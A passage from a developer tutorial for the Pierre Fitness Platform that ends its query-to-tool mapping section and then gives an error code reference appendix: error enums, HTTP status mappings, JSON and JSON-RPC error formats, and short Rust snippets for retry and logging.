compare_activitieswith two IDs - “better than…” → Fetch both, compare metrics
Pattern 3: Trend queries
- “am I improving?” →
analyze_performance_trends - “getting faster/slower?” → Trend analysis with slope
Pattern 4: Predictive queries
- “can I…?” →
analyze_goal_feasibility - “what if…?” →
predict_performancewith scenarios
Key Takeaways
- Natural language: AI assistants map user prompts to tool calls automatically.
- Temporal context: “last 10”, “this week”, “past month” determine filters.
- Implicit parameters: Provider (strava, garmin, fitbit, whoop, terra) often inferred from context or connection status.
- Tool chaining: Complex queries combine multiple tools sequentially.
- Context awareness: AI remembers previous queries for follow-up questions.
- Multi-provider: Users can connect multiple providers and query them independently.
End of Tutorial
You’ve completed the comprehensive Pierre Fitness Platform tutorial! You now understand:
- Part I: Foundation (architecture, errors, config, DI)
- Part II: Authentication & Security (cryptography, JWT, multi-tenancy, middleware)
- Part III: MCP Protocol (JSON-RPC, request flow, transports, tool registry)
- Part IV: SDK & Type System (bridge architecture, type generation)
- Part V: OAuth, A2A & Providers (OAuth server/client, provider abstraction, A2A protocol)
- Part VI: Tools & Intelligence (47 tools, sports science algorithms, recovery, nutrition)
- Part VII: Testing & Deployment (synthetic data, design system, production deployment)
Next Steps:
- Review CLAUDE.md for code standards
- Explore the codebase using Appendix C as a map
- Run the test suite to see synthetic data in action
- Set up local development environment
- Contribute improvements or new features
Happy coding! 🚀
Appendix H: Error Code Reference
This appendix provides a comprehensive reference of all error codes, their HTTP status mappings, and recommended handling strategies.
Error Code Categories
Pierre uses four primary error enums:
ErrorCode- Application-level error codes with HTTP mappingDatabaseError- Database operation errorsProviderError- Fitness provider API errorsProtocolError- Protocol operation errors (MCP/A2A)
ErrorCode → HTTP Status Mapping
Source: src/errors.rs:17-86
Authentication & Authorization (4xx)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
AuthRequired | 401 | No authentication provided | Prompt user to login |
AuthInvalid | 401 | Invalid credentials | Re-authenticate |
AuthExpired | 403 | Token has expired | Refresh token or re-login |
AuthMalformed | 403 | Token is corrupted | Re-authenticate |
PermissionDenied | 403 | Insufficient permissions | Request access or escalate |
Rate Limiting (429)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
RateLimitExceeded | 429 | Too many requests | Implement exponential backoff |
QuotaExceeded | 429 | Monthly quota exceeded | Upgrade tier or wait for reset |
Validation (400)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
InvalidInput | 400 | Input validation failed | Fix input and retry |
MissingRequiredField | 400 | Required field missing | Include required fields |
InvalidFormat | 400 | Data format incorrect | Check API documentation |
ValueOutOfRange | 400 | Value outside bounds | Use valid value range |
Resource Management (4xx)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
ResourceNotFound | 404 | Resource doesn’t exist | Check resource ID |
ResourceAlreadyExists | 409 | Duplicate resource | Use existing or rename |
ResourceLocked | 409 | Resource is locked | Wait and retry |
ResourceUnavailable | 503 | Temporarily unavailable | Retry with backoff |
External Services (5xx)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
ExternalServiceError | 502 | Provider returned error | Retry or report issue |
ExternalServiceUnavailable | 502 | Provider is down | Retry later |
ExternalAuthFailed | 503 | Provider auth failed | Re-connect provider |
ExternalRateLimited | 503 | Provider rate limited | Wait for provider reset |
Configuration (500)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
ConfigError | 500 | Configuration error | Contact administrator |
ConfigMissing | 500 | Missing configuration | Contact administrator |
ConfigInvalid | 500 | Invalid configuration | Contact administrator |
Internal Errors (500)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
InternalError | 500 | Unexpected server error | Retry, then report |
DatabaseError | 500 | Database operation failed | Retry, then report |
StorageError | 500 | Storage operation failed | Retry, then report |
SerializationError | 500 | JSON parsing failed | Check request format |
DatabaseError Variants
Source: src/database/errors.rs:10-140
| Variant | Context Fields | Typical Cause |
|---|---|---|
NotFound | entity_type, entity_id | Query returned no rows |
TenantIsolationViolation | entity_type, entity_id, requested_tenant, actual_tenant | Cross-tenant access attempt |
EncryptionFailed | context | Encryption key issue |
DecryptionFailed | context | AAD mismatch or corrupt data |
ConstraintViolation | constraint, details | Unique/foreign key violation |
ConnectionError | message | Pool exhausted or network |
QueryError | context | SQL syntax or type error |
MigrationError | version, details | Schema migration failed |
InvalidData | field, reason | Data type mismatch |
PoolExhausted | max_connections, wait_time_ms | Too many concurrent queries |
TransactionRollback | reason | Explicit rollback |
SchemaMismatch | expected, actual | Database version mismatch |
Timeout | operation, timeout_secs | Query took too long |
TransactionConflict | details | Deadlock or serialization failure |
ProviderError Variants
Source: src/providers/errors.rs:11-80
| Variant | Context Fields | Retry Strategy |
|---|---|---|
ApiError | provider, status_code, message, retryable | Check retryable field |
RateLimitExceeded | provider, retry_after_secs, limit_type | Wait retry_after_secs |
AuthenticationFailed | provider, reason | Re-authenticate user |
TokenExpired | provider | Auto-refresh token |
InvalidResponse | provider, context | Log and skip activity |
NetworkError | provider, message | Retry with backoff |
Timeout | provider, timeout_secs | Increase timeout or retry |
NotSupported | provider, feature | Feature unavailable |
ProtocolError Variants
Source: src/protocols/mod.rs:35-211
Protocol errors for MCP and A2A protocol operations:
Tool Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
ToolNotFound | tool_id, available_count | Tool ID doesn’t exist |
InvalidParameter | tool_id, parameter, reason | Parameter validation failed |
MissingParameter | tool_id, parameter | Required parameter not provided |
InvalidParameters | message | General parameter error |
ExecutionFailed | message | Tool execution error |
ExecutionFailedDetailed | tool_id, source | Tool execution with source error |
Protocol Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
UnsupportedProtocol | protocol | Protocol type not supported |
InvalidRequest | message | Malformed request |
InvalidRequestDetailed | protocol, reason | Request validation failure |
ConversionFailed | from, to, reason | Protocol format conversion error |
Configuration Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
ConfigMissing | key | Required config not set |
ConfigurationError | message | General config error |
ConfigurationErrorDetailed | message | Config error with details |
Plugin Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
PluginNotFound | plugin_id | Plugin ID doesn’t exist |
PluginError | plugin_id, details | Plugin execution failed |
Access Control Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
InsufficientSubscription | required, current | User tier too low |
RateLimitExceeded | requests, window_secs | Too many requests |
Other Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
Serialization | context, source | JSON serialization failed |
SerializationError | message | Simple serialization error |
Database | source | Database operation failed |
InvalidSchema | entity, reason | Schema validation error |
InternalError | message | Unexpected server error |
OperationCancelled | message | User cancelled operation |
JSON Error Response Format
All API errors return a consistent JSON structure:
{
"error": {
"code": "auth_expired",
"message": "The authentication token has expired",
"details": {
"expired_at": "2025-01-15T10:30:00Z",
"token_type": "access_token"
},
"request_id": "req_abc123"
}
}
Fields:
code: Machine-readable error code (snake_case)message: Human-readable descriptiondetails: Optional context-specific datarequest_id: Correlation ID for debugging
MCP Error Response Format
For MCP protocol, errors follow JSON-RPC 2.0 spec:
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32600,
"message": "Invalid Request",
"data": {
"pierre_code": "invalid_input",
"details": "Missing required field: provider"
}
}
}
JSON-RPC Error Codes:
| Code | Meaning | Pierre Mapping |
|---|---|---|
| -32700 | Parse error | SerializationError |
| -32600 | Invalid Request | InvalidInput |
| -32601 | Method not found | ResourceNotFound |
| -32602 | Invalid params | InvalidInput |
| -32603 | Internal error | InternalError |
| -32000 to -32099 | Server error | Application-specific |
Retry Strategies
Exponential Backoff
#![allow(unused)]
fn main() {
// Standard retry with exponential backoff
let delays = [100, 200, 400, 800, 1600]; // milliseconds
for (attempt, delay) in delays.iter().enumerate() {
match operation().await {
Ok(result) => return Ok(result),
Err(e) if e.is_retryable() => {
tokio::time::sleep(Duration::from_millis(*delay)).await;
}
Err(e) => return Err(e),
}
}
}
Rate Limit Handling
#![allow(unused)]
fn main() {
match provider.get_activities().await {
Err(ProviderError::RateLimitExceeded { retry_after_secs, .. }) => {
// Respect Retry-After header
tokio::time::sleep(Duration::from_secs(retry_after_secs)).await;
provider.get_activities().await
}
result => result,
}
}
Error Logging
All errors are logged with structured context:
#![allow(unused)]
fn main() {
tracing::error!(
error_code = %error.code(),
http_status = error.http_status(),
request_id = %request_id,
user_id = %user_id,
"Operation failed: {}", error
);
}
Key Takeaways
- Consistent HTTP mapping:
ErrorCode::http_status()provides standardized status codes. - Structured context: All errors include relevant context fields for debugging.
- Retry guidance:
retryablefield andretry_after_secsguide client behavior. - Tenant isolation:
TenantIsolationViolationis a security-critical error. - JSON-RPC compliance: MCP errors follow JSON-RPC 2.0 specification.
- Request correlation: All errors include
request_idfor distributed tracing.
Related Chapters:
- Chapter 2: Error Handling (structured error patterns)
- Chapter 9: JSON-RPC Foundation (MCP error codes)
- Appendix E: Rate Limiting (quota errors)